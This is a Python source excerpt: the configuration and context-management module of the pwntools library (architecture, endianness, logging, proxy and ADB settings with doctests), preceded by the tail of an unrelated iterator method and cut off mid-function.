elif isinstance(payload, self.ErrorBox):
# we've got an error, re-raise it
self.close()
raise payload.error
else:
# we've got a normal batch for the current epoch,
# so yield it
yield payload
finally:
self._epoch_counter += 1
def copy(self, **kwargs):
return self._copy_helper(('prefetch',), source=self.source, **kwargs)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
from __future__ import division
import collections
import functools
import logging
import os
import platform
import six
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
    This is necessary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print(t)
{'key': 'value'}
>>> def p(): print(t)
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
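# Hedged illustration (not part of pwnlib): a toy class showing how the
# _validator decorator above turns a validation function into a property whose
# storage lives on self._tls. A plain dict stands in for the thread-local
# _DictStack here; the class and attribute names are made up.
class _ValidatorDemo(object):
    def __init__(self):
        self._tls = {}
    @_validator
    def level(self, value):
        """Demo attribute that must be a non-negative integer."""
        value = int(value)
        if value < 0:
            raise AttributeError('level must be >= 0')
        return value
# demo = _ValidatorDemo(); demo.level = '3'; demo.level == 3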
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherit its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
    Threads created by using the native :class:`threading.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print(context.arch)
... context.arch = 'mips'
... print(context.arch)
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print(context.arch)
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print(context.arch)
arm
Implementation Details:
        This class is implemented by hooking the private function
:func:`threading.Thread._Thread_bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
sup = super(Thread, self)
bootstrap = getattr(sup, '_bootstrap', None)
if bootstrap is None:
sup.__bootstrap()
else:
bootstrap()
_bootstrap = __bootstrap
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print(i)
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print(enhex(pwnlib.asm.asm('nop')))
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase.encode(),
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'encoding': 'auto',
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': b'\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android','baremetal'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
'none': {},
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print(context.timeout)
1.0
>>> with context.local(timeout = 2):
... print(context.timeout)
... context.timeout = 3
... print(context.timeout)
2.0
3.0
>>> print(context.timeout)
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function."""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'baremetal', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armv7l', 'arm'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = self.architectures[arch]
except KeyError:
            raise AttributeError('arch must be one of %r' % sorted(self.architectures))
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
        Even then, this doesn't matter much -- only when the segment
        registers need to be known.
"""
with self.local(arch=arch):
return self.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
        Infer target architecture, bit-width, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits // 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits // 8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def encoding(self, charset):
if charset == 'auto':
return charset
if ( b'aA'.decode(charset) != 'aA'
or 'aA'.encode(charset) != b'aA'):
raise ValueError('Strange encoding!')
return charset
def _encode(self, s):
if isinstance(s, (bytes, bytearray)):
return s # already bytes
if self.encoding == 'auto':
try:
return s.encode('latin1')
except UnicodeEncodeError:
return s.encode('utf-8', 'surrogateescape')
return s.encode(self.encoding)
def _decode(self, b):
if self.encoding == 'auto':
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b.decode('latin1')
except AttributeError:
return b
return b.decode(self.encoding)
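    # Hedged illustration of the 'auto' encoding behaviour implemented above:
    # _encode() prefers latin-1 and falls back to UTF-8 with surrogateescape,
    # while _decode() tries UTF-8 first and falls back to latin-1, e.g.
    # context._encode(u'ÿ') == b'\xff' and context._decode(b'\xff') == u'ÿ'.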
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))
return self.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
        inside the handler for logging to the screen. So if you want to e.g. log
        all messages to a file, this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> open('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> open('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> open('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> open('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not hasattr(value, "fileno"):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'baremetal', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = self.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (bytes, six.text_type)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
xdg_cache_home = os.environ.get('XDG_CACHE_HOME') or \
os.path.join(os.path.expanduser('~'), '.cache')
if not os.access(xdg_cache_home, os.W_OK):
return None
cache = os.path.join(xdg_cache_home, '.pwntools-cache-%d.%d' % sys.version_info[:2])
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def newline(self, v):
"""Line ending used for Tubes by default.
This configures the newline emitted by e.g. ``sendline`` or that is used
as a delimiter for e.g. ``recvline``.
"""
return six.ensure_binary(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
        like PEDA, but you do not want GDB to include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return alphabet.encode()
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
arch = context.arch
bits = context.bits
endian = context.endian
# Prevent the user from doing silly things with invalid
# architecture / bits / endianness combinations.
if (arch == 'i386' and bits != 32) \
or (arch == 'amd64' and bits != 64):
raise AttributeError("Invalid arch/bits combination: %s/%s" % (arch, bits))
if arch in ('i386', 'amd64') and endian == 'big':
raise AttributeError("Invalid arch/endianness combination: %s/%s" % (arch, endian))
return function(*a, **kw)
return setter
def LocalNoarchContext(function):
"""
Same as LocalContext, but resets arch to :const:`'none'` by default
Example:
>>> @LocalNoarchContext
... def printArch():
... print(context.arch)
>>> printArch()
none
"""
@functools.wraps(function)
def setter(*a, **kw):
kw.setdefault('arch', 'none')
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
